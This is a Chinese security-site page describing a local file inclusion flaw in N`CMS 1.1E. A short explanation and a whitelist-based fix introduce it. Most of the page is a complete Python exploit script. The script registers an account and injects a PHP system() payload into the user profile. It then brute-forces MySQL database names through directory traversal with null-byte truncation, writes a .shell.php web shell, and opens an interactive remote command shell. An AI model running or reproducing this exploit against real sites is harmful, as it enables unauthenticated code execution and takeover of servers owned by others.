N`CMS 1.1E 本地文件包含漏洞及修复

添加时间:2011-3-12  添加: admin 

N`CMS 是一款内容管理系统。N`CMS 1.1E 存在本地文件包含漏洞:下文引用的 PHP 代码将 GET 参数 page 未经任何校验直接拼接进 include() 的路径,因此通过目录遍历序列可以包含站点目录之外的文件,可能导致敏感信息泄露;在 gpc_magic_quotes 关闭(空字节可截断 .php 后缀)的配置下,页面所附的利用程序还表明该漏洞可进一步被用于远程代码执行。修复思路:不要把用户输入直接拼入 include 路径,应将 page 与预定义的页面名白名单比对(或只接受字母、数字、下划线和连字符),不匹配时直接回落到 404 页面。

N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit

#!/usr/bin/python  # ~INFORMATION  # Exploit Title:    N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit  # Date:         11/3/2011  # Software link:    http://bit.ly/eJAyw5  # Tested on:        Linux bt  # Version:      1.1E  # PHP.ini Settings: gpc_magic_quotes = Off     # Note: The web application was lucky to not be exploited by session   # injection with a malicious username example <?php system($_GET[cmd])>   # as htmlentities() encoded the bracket :-)     # ~VULNERABLE CODE  '''  <?php  if( isset( $_GET['page'] ) )  {      if( file_exists( 'page/'.$_GET['page'].'.php' ) )      {          include( 'page/'.$_GET['page'].'.php' );      }      else      {          include( 'page/404.php' );      }  }  else  {      include( 'page/home.php' );  }  ?>  ''' import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass  from optparse import OptionParser  from urlparse import urlparse,urljoin  from urllib import urlopen  from cookielib import CookieJar     __CONTACT__ ="TecR0c(tecr0c@tecninja.net)" __DATE__ ="11.3.2011"    usage = 'Example : %s http://localhost/ncms/ -c user:pass -w databases.txt -p' % __file__  parser = OptionParser(usage=usage)  parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",          help="HTTP Proxy <server>:<port>")  parser.add_option("-w","--wordlist", type="string",action="store", dest="wordlist",          help="file to use to bruteforce database")  parser.add_option("-c","--credentials", type="string",action="store", dest="credentials",default="hacker:ph33r",          help="credentials for login, "     "or [default: %default]")     (options, args) = parser.parse_args()     if options.proxy:      print '[+] Using Proxy'+options.proxy     # User Agents  agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",          "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",          "Google Chrome (Windows XP)",          "Opera 9.25 (Windows Vista)",          "Mozilla/4.0 (compatible; MSIE 
7.0b; Windows NT 5.1)",          "Opera/8.00 (Windows NT 5.1; U; en)"]  agent = random.choice(agents)     traversal = './../../../../../../../..'    def banner():      if os.name == "posix":          os.system("clear")      else:          os.system("cls")      header = '''  |----------------------------------------|  |Exploit: N'CMS LFI RCE  |Author: %s  |Date: %s  |----------------------------------------|\n  '''%(__CONTACT__,__DATE__)      for i in header:          print "\b%s"%i,          sys.stdout.flush()          time.sleep(0.005)     def proxyCheck():          if options.proxy:                  try:                          h2 = httplib.HTTPConnection(options.proxy)                          h2.connect()                          print "[+] Using Proxy Server:",options.proxy                  except(socket.timeout):                          print "[-] Proxy Timed Out\n"                         pass                         sys.exit(1)                  except(NameError):                          print "[-] Proxy Not Given\n"                         pass                         sys.exit(1)                  except:                          print "[-] Proxy Failed\n"                         pass                         sys.exit(1)     def getProxy():          try:                  proxy_handler = urllib2.ProxyHandler({'http': options.proxy})          except(socket.timeout):                  print "\n[-] Proxy Timed Out"                 sys.exit(1)          return proxy_handler     cj = CookieJar()  if options.proxy:      opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))  else:      opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  opener.addheaders = [('User-agent', agent)]     def registerUser():          webSiteUrl = url.geturl()+"?page=register"     parameters = {'login' : username,'password': password,'password2' : password,'email' : 'test@test.com',      'register' : '+Enregistrer+'}      encodedParameters = 
urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()      print '[+] Created User, '+username      def edit_profile():          webSiteUrl = url.geturl()+"?page=edit_profil"     parameters = { 'User-Agent' : agent,      'profil' : '<?php system(base64_decode($_REQUEST["cmd"]));?>','edit_profil' : '+Enregistrer+'}      encodedParameters = urllib.urlencode(parameters)      try:          response = opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()      print '[+] Added Payload To Page'    def login():          """ Add php payload to database """         webSiteUrl = url.geturl()+"?page=register"     parameters = {'login' : username,'password' : password,'actplayer' : 'login'}      encodedParameters = urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:           print '[-] Failed'         sys.exit()      print '[+] Authenticated To Website'    def traversalCmd(encodedCommand,database):      webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00"     parameters = {'cmd' : encodedCommand}      encodedParameters = urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()     def postRequestWebShell(encodedCommand):          webSiteUrl = url.geturl()+'.shell.php'     commandToExecute = [      ('cmd',encodedCommand)]      cmdData = urllib.urlencode(commandToExecute)      try:          response = opener.open(webSiteUrl, cmdData).read()      except:          print '[-] Failed'         sys.exit()      return response     def fileCheck():          webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/mysql_upgrade_info%00"     try:          response = opener.open(webSiteUrl).read()      except:          print '[-] 
Failed'         sys.exit()      doesntExist = re.compile(r"Erreur 404")      findAnswer = doesntExist.search(response)      if findAnswer:          "[-] Can Not Use This Techinque"         sys.exit()     def bruteForceDatabase():      try:              databases = open(options.wordlist, "r").readlines()              print "[+] Length Of Wordlist: "+str(len(databases))      except(IOError):              print "[-] Error: Check Your Wordlist Path\n"             sys.exit(1)      for database in databases:              database = database.replace("\r","").replace("\n","")              webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00"         print '[X] Testing Database Name: '+database          try:              response = opener.open(webSiteUrl).read()          except urllib2.HTTPError, error:                              print '[-] Failed'         payload = re.compile(r"Erreur 404")          findPayload = payload.search(response)          if not findPayload:              print '[+] Found Database: '+database+'\n'             commandLine(database)     def commandLine(database):      encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"     encodedCommand = base64.b64encode(encodedCommand)      traversalCmd(encodedCommand,database)      commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)      while True:          try:              command = raw_input(commandLine)              encodedCommand = base64.b64encode(command)              response = postRequestWebShell(encodedCommand)              print response          except KeyboardInterrupt:              encodedCommand = base64.b64encode('rm .shell.php')              postRequestWebShell(encodedCommand)              print "\n[!] 
Removed .shell.php\n"             sys.exit()     if "__main__" == __name__:          banner()      try:              url=urlparse(args[0])      except:              parser.print_help()              sys.exit()      getProxy()      username, password = options.credentials.split(':')      proxyCheck()      registerUser()      login()      edit_profile()      fileCheck()      bruteForceDatabase() 修复:本地包含漏洞修复请查阅本站



